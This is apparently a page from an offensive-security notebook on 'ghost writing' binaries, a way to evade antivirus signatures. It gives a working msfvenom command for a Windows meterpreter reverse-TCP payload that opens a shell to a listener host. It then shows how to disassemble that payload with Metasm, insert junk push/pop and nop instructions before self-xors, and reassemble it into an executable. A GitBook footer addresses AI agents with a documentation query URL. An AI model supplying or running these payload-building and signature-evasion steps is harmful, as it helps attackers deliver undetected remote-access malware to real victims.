> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/covering-tracks/ghost-writing-binaries.md). # Ghost Writing Binaries * Changing of the Assembly source code, to alter the well known signature used by anti-virus engines. * Overview ``` Create a .exe Convert it to .asm Edit the .asm file Convert back to .exe ``` * Most of the time you dont want to alter the functionality of the binary. * Some additional (outside of Ghostwriting) things that can help with evading signatures are: ``` Removing the Help menu of a tool Removing instances of the tool name in the source code ``` ### Ghost Writing How To * Generate a `msfvenom` payload for example ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86 ``` * Now that you have a raw payload, convert it to ASCII `asm source` * The Metasm script is a great option to accomplish this * ``` ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm ``` * Now open the file in `gedit` ### Obfuscation of ASM File * At the very top of the file add: ``` .section '.text' rwx .entrypoint ``` * Now start by finding any instance of `xor` where a register is `xor` (ed) against itself. * When something is `xor` against it self, it will clear the register to a value of 0 * For example look for something like this ``` xor eax, eax ``` * Because the normal code execution will clear out any value in `eax` we can add additional instructions before the `xor` * Thus we can add this in before the `xor` statement ``` push eax pop eax xor eax, eax ``` * Also feel free to add in other additional irrelevant instructions before an `xor` occurs. Remember only where an operand is `xor` with itself. * Also can add `nop` instructions into the program at the correct places. * Testing is your best friend here ### Convert Back * Once you are done altering the `asm` it is time to convert it back to an `exe` ``` ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/covering-tracks/ghost-writing-binaries.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.